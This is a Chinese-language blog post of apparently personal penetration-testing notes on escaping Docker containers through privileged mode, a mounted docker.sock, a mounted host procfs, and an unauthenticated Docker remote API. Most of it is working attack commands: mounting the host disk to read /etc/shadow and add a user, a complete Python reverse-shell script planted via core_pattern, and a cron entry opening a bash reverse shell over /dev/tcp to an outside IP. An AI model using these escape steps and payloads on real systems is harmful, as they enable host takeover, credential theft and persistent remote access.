<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>云原生-docker | Hao's Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=undefined"><link rel="stylesheet" type="text/css" href="https://unpkg.com/normalize.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/pure-min.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="https://unpkg.com/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="https://unpkg.com/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="https://unpkg.com/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="https://unpkg.com/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="https://unpkg.com/toastr/build/toastr.min.css"><div class="darkmode-toggle">🌓</div><script>var prefersDarkMode = window.matchMedia('(prefers-color-scheme: dark)');
var toggle = document.querySelector('.darkmode-toggle');
var html = document.querySelector('html');

html.dataset.dark = localStorage.dark || prefersDarkMode.matches;

toggle.addEventListener('click', () => {
localStorage.dark = !(html.dataset.dark == 'true');
html.dataset.dark = localStorage.dark;
});</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">云原生-docker</h1><a id="logo" href="/.">Hao's Blog</a><p class="description"></p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">云原生-docker</h1><div class="post-meta">2025-06-17<span> | </span><span class="category"><a href="/categories/%E4%BA%91%E5%AE%89%E5%85%A8/">云安全</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%91%E5%8E%9F%E7%94%9F-docker"><span class="toc-number">1.</span> <span class="toc-text">云原生-docker</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8-%E7%89%B9%E6%9D%83%E6%A8%A1%E5%BC%8F"><span class="toc-number">1.1.</span> <span class="toc-text">容器逃逸 - 特权模式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8-%E6%8C%82%E8%BD%BD-%E9%80%83%E9%80%B8"><span class="toc-number">1.2.</span> <span class="toc-text">容器逃逸 - 挂载 逃逸</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%82%E8%BD%BD-Docker-Socket-%E9%80%83%E9%80%B8-%EF%BC%9A"><span class="toc-number">1.3.</span> <span class="toc-text">挂载 Docker Socket 逃逸 ：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%82%E8%BD%BD-procfs-%E9%80%83%E9%80%B8-%EF%BC%9A"><span class="toc-number">1.4.</span> <span class="toc-text">挂载 procfs 逃逸 ：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Docker-%E8%BF%9C%E7%A8%8B-API-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E9%80%83%E9%80%B8"><span class="toc-number">1.5.</span> <span class="toc-text">Docker 远程 API 未授权访问逃逸</span></a></li></ol></li></ol></div></div><div class="post-content"><h1 id="云原生-docker"><a href="#云原生-docker" class="headerlink" title="云原生-docker"></a>云原生-docker</h1><p>拿到权限：判断是否为容器</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_23936389/article/details/131486643">https://blog.csdn.net/qq_23936389/article/details/131486643</a></p>
<p>三种安全容器逃逸：</p>
<ul>
<li>特权模式启动导致（不安全启动 适用于 java jsp 高权限无需提权 还要提权才能逃<br>逸）</li>
<li>危险挂载启动导致（危险启动 适用于 java jsp 高权限无需提权 还要提权才能逃逸）<br>-docker 自身 &amp; 系统漏洞（软件漏洞和系统漏洞 都可用）<br><a target="_blank" rel="noopener" href="https://wiki.teamssix.com/cloudnative/">https://wiki.teamssix.com/cloudnative/</a></li>
</ul>
<h2 id="容器逃逸-特权模式"><a href="#容器逃逸-特权模式" class="headerlink" title="容器逃逸 - 特权模式"></a>容器逃逸 - 特权模式</h2><p><a target="_blank" rel="noopener" href="https://wiki.teamssix.com/CloudNative/Docker/docker-privileged-escape.html">https://wiki.teamssix.com/CloudNative/Docker/docker-privileged-escape.html</a></p>
<p>启动 docker 容器：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run --rm --privileged=true -it alpine  //启用--privileged=true，container内的root拥有真正的root权限，可能让攻击者利用此进行容器逃逸</span><br></pre></td></tr></table></figure>
<p>判断是否为容器环境：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/1/cgroup | grep -qi docker &amp;&amp; echo &quot;Is Docker&quot; || echo &quot;Not Docker&quot;</span><br></pre></td></tr></table></figure>
<p>如果返回 Is Docker，说明当前是 Docker 容器环境，反之亦然。</p>
<p>判断特权模式：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/self/status | grep -qi &quot;0000003fffffffff&quot; &amp;&amp; echo &quot;Is privileged mode&quot; || echo &quot;Not privileged mode&quot;</span><br><span class="line">或者</span><br><span class="line">cat /proc/self/status | grep CapEff </span><br></pre></td></tr></table></figure>
<p>在容器内部执行下面的命令，从而判断容器是不是特权模式，如果是以特权模式启动的话，CapEff 对应的掩码值应该为 0000003fffffffff 或者是 0000001fffffffff</p>
<p>方法一：</p>
<p>查看挂载磁盘设备：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fdisk -l</span><br></pre></td></tr></table></figure>
<p>在容器内部执行以下命令，将宿主机文件挂载到 &#x2F;test 目录下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mkdir /test &amp;&amp; mount /dev/sda1 /test</span><br></pre></td></tr></table></figure>
<p>尝试访问宿主机 shadow 文件，可以看到正常访问</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /test/etc/shadow</span><br></pre></td></tr></table></figure>
<p>方法二</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mount /dev/sda1 /mnt</span><br><span class="line">chroot /mnt adduser john</span><br></pre></td></tr></table></figure>
<p>通过新添加的用户登录</p>
<h2 id="容器逃逸-挂载-逃逸"><a href="#容器逃逸-挂载-逃逸" class="headerlink" title="容器逃逸 - 挂载 逃逸"></a>容器逃逸 - 挂载 逃逸</h2><p><a target="_blank" rel="noopener" href="https://wiki.teamssix.com/CloudNative/Docker/docker-procfs-escape.html">https://wiki.teamssix.com/CloudNative/Docker/docker-procfs-escape.html</a></p>
<p>启动容器：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu //procfs</span><br><span class="line">docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu //Socket</span><br></pre></td></tr></table></figure>

<h2 id="挂载-Docker-Socket-逃逸-："><a href="#挂载-Docker-Socket-逃逸-：" class="headerlink" title="挂载 Docker Socket 逃逸 ："></a>挂载 Docker Socket 逃逸 ：</h2><p>执行以下命令，如果返回 Docker Socket is mounted. 说明当前挂载了 Docker Socket</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ls /var/run/ | grep -qi docker.sock &amp;&amp; echo &quot;Docker Socket is mounted.&quot; || echo &quot;Docker Socket is not mounted.&quot;</span><br><span class="line">ls -lah /var/run/docker.sock</span><br></pre></td></tr></table></figure>
<p>在容器内部创建一个新的容器，并将宿主机目录挂载到新的容器内部</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -v /:/host ubuntu /bin/bash</span><br></pre></td></tr></table></figure>
<p>在新的容器内执行 chroot，将根目录切换到挂载到宿主机的根目录</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chroot /host</span><br></pre></td></tr></table></figure>

<h2 id="挂载-procfs-逃逸-："><a href="#挂载-procfs-逃逸-：" class="headerlink" title="挂载 procfs 逃逸 ："></a>挂载 procfs 逃逸 ：</h2><p>执行以下命令，如果返回 Procfs is mounted. 说明当前挂载了 procfs</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name core_pattern 2&gt;/dev/null | wc -l | grep -q 2 &amp;&amp; echo &quot;Procfs is mounted.&quot; || echo &quot;Procfs is not mounted.&quot;</span><br></pre></td></tr></table></figure>
<p>如果找到两个 core_pattern 文件，那可能就是挂载了宿主机的 procfs</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name core_pattern</span><br></pre></td></tr></table></figure>
<p>找到当前容器在宿主机下的绝对路径</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/mounts | xargs -d &#x27;,&#x27; -n 1 | grep workdir</span><br><span class="line">//为绝对路/var/lib/docker/overlay2/5717cb9154218ec49579ae338cd1c236694d6a377d61fd6d17e11e49d1b1baad/merged</span><br></pre></td></tr></table></figure>
<p>安装 vim 和 gcc</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt-get update -y &amp;&amp; apt-get install vim gcc -y</span><br><span class="line">vim /tmp/.t.py</span><br></pre></td></tr></table></figure>
<p>创建一个反弹 Shell 的 py 脚本</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/usr/bin/python3</span></span><br><span class="line">import  os</span><br><span class="line">import pty</span><br><span class="line">import socket</span><br><span class="line">lhost = &quot;172.16.214.1&quot;</span><br><span class="line">lport = 4444</span><br><span class="line">def main():</span><br><span class="line">   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">   s.connect((lhost, lport))</span><br><span class="line">   os.dup2(s.fileno(), 0)</span><br><span class="line">   os.dup2(s.fileno(), 1)</span><br><span class="line">   os.dup2(s.fileno(), 2)</span><br><span class="line">   os.putenv(&quot;HISTFILE&quot;, &#x27;/dev/null&#x27;)</span><br><span class="line">   pty.spawn(&quot;/bin/bash&quot;)</span><br><span class="line"><span class="meta prompt_">   # </span><span class="language-bash">os.remove(<span class="string">&#x27;/tmp/.t.py&#x27;</span>)</span></span><br><span class="line">   s.close()</span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">   main()</span><br></pre></td></tr></table></figure>
<p>给 Shell 赋予执行权限</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod 777 .t.py</span><br></pre></td></tr></table></figure>
<p>写入反弹 shell 到目标的 proc 目录下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo -e &quot;|/var/lib/docker/overlay2/5717cb9154218ec49579ae338cd1c236694d6a377d61fd6d17e11e49d1b1baad/merged/tmp/.t.py \rcore    &quot; &gt;  /host/proc/sys/kernel/core_pattern</span><br></pre></td></tr></table></figure>
<p>在攻击主机上开启一个监听，然后在容器里运行一个可以崩溃的程序</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">vim t.c</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">include&lt;stdio.h&gt;</span></span><br><span class="line">int main(void)  &#123;</span><br><span class="line">   int *a  = NULL;</span><br><span class="line">   *a = 1;</span><br><span class="line">   return 0;</span><br><span class="line">&#125;</span><br><span class="line">gcc t.c -o t</span><br><span class="line">./t</span><br></pre></td></tr></table></figure>
<h2 id="Docker-远程-API-未授权访问逃逸"><a href="#Docker-远程-API-未授权访问逃逸" class="headerlink" title="Docker 远程 API 未授权访问逃逸"></a>Docker 远程 API 未授权访问逃逸</h2><p>docker remote api 可以执行 docker 命令，docker 守护进程监听在 0.0.0.0，可直接调用 API 来操作 docker</p>
<p>将 docker 守护进程监听在 0.0.0.0</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375</span><br></pre></td></tr></table></figure>
<p>检测：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">IP=`hostname -i | awk -F. &#x27;&#123;print $1 &quot;.&quot; $2 &quot;.&quot; $3 &quot;.1&quot;&#125;&#x27; ` &amp;&amp; wget http://$IP:2375</span><br></pre></td></tr></table></figure>
<p>如果返回 404 说明存在</p>
<p>列出容器信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://&lt;target&gt;:2375/containers/json</span><br></pre></td></tr></table></figure>
<p>查看容器</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker -H tcp://&lt;target&gt;:2375 ps -a</span><br></pre></td></tr></table></figure>
<p>新运行一个容器，挂载点设置为服务器的根目录挂载至 &#x2F;mnt 目录下。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker -H tcp://10.1.1.211:2375 run -it -v /:/mnt nginx:latest /bin/bash</span><br></pre></td></tr></table></figure>

<p>在容器内执行命令，将反弹 shell 的脚本写入到 &#x2F;var&#x2F;spool&#x2F;cron&#x2F;root</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;* * * * * /bin/bash -i &gt;&amp; /dev/tcp/10.1.1.214/12345 0&gt;&amp;1&#x27; &gt;&gt; /mnt/var/spool/cron/crontabs/root</span><br></pre></td></tr></table></figure>
<p>本地监听端口，获取对方宿主机 shell。</p>
</div><div class="tags"><ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" rel="tag">云安全</a></li></ul></div><div class="post-nav"><a class="pre" href="/2025/06/17/%E4%BA%91%E6%94%BB%E9%98%B2-%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7CDK/">云攻防-自动化工具CDK</a><a class="next" href="/2025/06/17/%E4%BA%91%E6%94%BB%E9%98%B2-k8s%E6%90%AD%E5%BB%BA/">云攻防-K8S搭建</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="search-form"><input id="local-search-input" placeholder="Search" type="text" name="q" results="0"/><div id="local-search-result"></div></div></div><div class="widget"><div class="author-info"><a class="info-avatar" href="/about/" title="关于"><img class="nofancybox" src="/img/avatar.jpg"/></a><p>所幸仍有光.</p><a class="info-icon" href="https://hackerhao.top" title="Email" target="_blank" style="margin-inline:5px"> <i class="fa fa-envelope-square" style="margin-inline:5px"></i></a><a class="info-icon" href="https://github.com/isMyHao" title="Github" target="_blank" style="margin-inline:5px"> <i class="fa fa-github-square" style="margin-inline:5px"></i></a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Java基础知识</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java%E5%AE%89%E5%85%A8/">Java安全</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Js%E5%AE%89%E5%85%A8/">Js安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">PHP代码审计</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP%E5%AE%89%E5%85%A8/">PHP安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Win%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">Win权限提升</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux%E6%8F%90%E6%9D%83/">linux提权</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/tools/">tools</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BA%91%E5%AE%89%E5%85%A8/">云安全</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%85%8D%E6%9D%80/">免杀</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%86%85%E7%BD%91/">内网</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">基础知识</a><span class="category-list-count">12</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">权限提升</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0/">漏洞发现</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/%E5%9F%BA%E7%A1%80/" style="font-size: 15px;">基础</a> <a href="/tags/%E5%85%8D%E6%9D%80/" style="font-size: 15px;">免杀</a> <a href="/tags/Js%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Js安全</a> <a href="/tags/Java%E5%9F%BA%E7%A1%80/" style="font-size: 15px;">Java基础</a> <a href="/tags/Java%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Java安全</a> <a href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 15px;">PHP代码审计</a> <a href="/tags/PHP%E5%AE%89%E5%85%A8/" style="font-size: 15px;">PHP安全</a> <a href="/tags/%E9%9D%B6%E5%9C%BA/" style="font-size: 15px;">靶场</a> <a href="/tags/linux%E6%8F%90%E6%9D%83/" style="font-size: 15px;">linux提权</a> <a href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" style="font-size: 15px;">云安全</a> <a href="/tags/tools/" style="font-size: 15px;">tools</a> <a href="/tags/%E5%86%85%E7%BD%91/" style="font-size: 15px;">内网</a> <a href="/tags/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/" style="font-size: 15px;">权限提升</a> <a href="/tags/Win%E6%8F%90%E5%8D%87/" style="font-size: 15px;">Win提升</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0/" style="font-size: 15px;">漏洞发现</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E6%8A%93%E5%8C%85%E5%B7%A5%E5%85%B7/">抓包工具</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E6%8A%93%E5%8C%85/">抓包</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E4%BA%91%E6%94%BB%E9%98%B2-%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7CDK/">云攻防-自动化工具CDK</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E4%BA%91%E6%94%BB%E9%98%B2-%E4%BA%91%E5%8E%9F%E7%94%9F-docker/">云原生-docker</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E4%BA%91%E6%94%BB%E9%98%B2-k8s%E6%90%AD%E5%BB%BA/">云攻防-K8S搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E4%BA%91%E6%94%BB%E9%98%B2-K8S%E5%AE%89%E5%85%A8/">云攻防-K8S安全</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-3/">信息收集-3</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-2/">信息收集-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-1/">信息收集-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/06/17/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-3/">权限提升-3-Win提权</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div></div></div></div><div class="pure-u-1 pure-u-md-3-4"></div></div><script type="text/javascript" src="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=undefined" async></script><link rel="stylesheet" type="text/css" href="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.css"><link rel="stylesheet" type="text/css" href="/css/search.css?v=undefined"><script type="text/javascript" src="/js/search.js?v=undefined"></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
  search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" color="0,0,0" opacity="0.5" zIndex="-2" count="50" src="https://unpkg.com/canvas-nest.js/dist/canvas-nest.js"></script><script type="text/javascript" src="/js/love.js?v=undefined"></script><script type="text/javascript" src="/js/copycode.js?v=undefined" successtext="复制成功！"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css?v=undefined"><link rel="stylesheet" type="text/css" href="/css/external.css?v=undefined"><script type="text/javascript" src="/js/codeblock-resizer.js?v=undefined"></script><script type="text/javascript" src="/js/smartresize.js?v=undefined"></script></div></body></html>